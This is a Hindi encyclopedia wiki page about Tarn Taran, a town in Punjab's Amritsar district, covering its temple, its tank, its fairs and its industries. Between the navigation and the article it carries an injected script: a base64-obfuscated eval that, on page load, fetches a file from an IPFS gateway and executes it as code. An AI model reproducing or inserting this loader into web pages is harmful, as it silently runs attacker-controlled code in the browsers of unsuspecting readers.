तरनतारन

अद्‌भुत भारत की खोज
Bharatkhoj (चर्चा | योगदान) द्वारा परिवर्तित १०:०३, २१ जुलाई २०१५ का अवतरण (तरन तारन का नाम बदलकर तरनतारन कर दिया गया है)
नेविगेशन पर जाएँ खोज पर जाएँ
गणराज्य इतिहास पर्यटन भूगोल विज्ञान कला साहित्य धर्म संस्कृति शब्दावली विश्वकोश भारतकोश

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

तरन तारन पंजाब राज्य के अमृतसर जिले में तरन तारन नामक तहसील का नगर है, जो उत्तरी-पश्चिमी रेलवे की अमृतसर शाखा पर स्थित है। यहाँ से अमृतसर १४ मील उत्तर में है जो पक्की सड़क द्वारा इससे जुड़ा है। उच्चतर क्षेत्र का यह प्रमुख नगर है, जिसका धार्मिक महत्व अधिक है। यहाँ १७६८ ई० में बना एक मंदिर और एक प्रसिद्ध तालाब है जिसमें दूर दूर से कोढ़ी लोग अपने रोग से मुक्ति पाने कि लिये आते हैं। नगर से थोड़ी ही दूरी पर बारी दोआब नहर बहती है। चैत्र एवं भाद्रपद में यहाँ विशेष मेले लगते हैं। यहाँ के उद्योगों में लोहे के बरतन बनाना तथा कपास से बिनौला निकालना प्रमुख है। यहाँ पर स्कूल, सरकारी अस्पताल आदि है।

टीका टिप्पणी और संदर्भ